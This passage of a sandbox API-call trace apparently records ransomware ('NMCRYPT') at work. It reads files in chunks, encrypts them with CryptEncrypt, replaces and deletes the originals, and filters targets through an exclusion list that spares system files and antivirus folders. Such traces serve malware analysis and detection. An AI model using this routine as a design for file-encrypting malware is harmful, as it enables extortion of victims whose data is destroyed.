hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.701] GetLastError () returned 0x0 [0145.701] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.701] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.701] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.701] GetLastError () returned 0x0 [0145.701] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.701] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.701] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.701] GetLastError () returned 0x0 [0145.701] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.701] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.702] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.702] GetLastError () returned 0x0 [0145.702] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.702] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.702] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.702] GetLastError () returned 0x0 [0145.702] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.702] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.702] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.702] GetLastError () returned 0x0 [0145.702] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.702] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x72, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x72, lpOverlapped=0x0) returned 1 [0145.702] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x72, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x80) returned 1 [0145.702] GetLastError () returned 0x0 [0145.702] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x80, lpOverlapped=0x0) returned 1 [0145.702] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0145.702] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0145.702] CloseHandle (hObject=0x1624) returned 1 [0145.702] CloseHandle (hObject=0x588) returned 1 [0145.703] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsar.xml")) returned 0x20 [0145.703] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml", dwFileAttributes=0x20) returned 0 [0145.703] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 1 [0145.703] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsar.xml")) returned 0 [0145.704] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml" [0145.704] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0145.704] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXABFD.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxabfd.tmp")) returned 0xabfd [0145.704] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsar.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXABFD.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxabfd.tmp"), dwFlags=0x1) returned 0 [0145.704] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXABFD.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxabfd.tmp")) returned 1 [0145.704] CryptDestroyKey (hKey=0x9ad4f8) returned 1 [0145.704] wcslen (_String="OK") returned 0x2 [0145.704] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0145.705] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0145.705] CryptDestroyKey (hKey=0x9ad178) returned 1 [0145.705] CryptDestroyHash (hHash=0x9ad738) returned 1 [0145.705] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0145.705] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*NMCRYPT") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*Recovers your files.html") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*.exe") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*.dll") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*.lnk") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*.bat") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*.ini") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*.msi") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*.scf") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*pagefile.sys*") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*NTUSER.DAT*") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*AppData*") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*\\winrar\\*") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*\\java\\*") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*\\windows\\*") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*\\ESET\\*") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*\\AVG\\*") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*\\AVIRA\\*") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*Atheros*") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*Realtek*") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*bootmgr*") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*boot*") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*boot*") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*CONFIG.SYS*") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*IO.SYS*") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*MSDOS.SYS*") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*NTDETECT.COM*") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*ntldr*") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*chrome*") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*opera*") returned 0 [0145.705] PathMatchSpecW (pszFile="ipscat.xml", pszSpec="*firefox*") returned 0 [0145.705] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml", pszSpec="*") returned 1 [0145.705] strlen (_Str="NMoreira") returned 0x8 [0145.705] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.705] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.705] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.705] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.705] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.705] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.706] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.707] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.708] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: 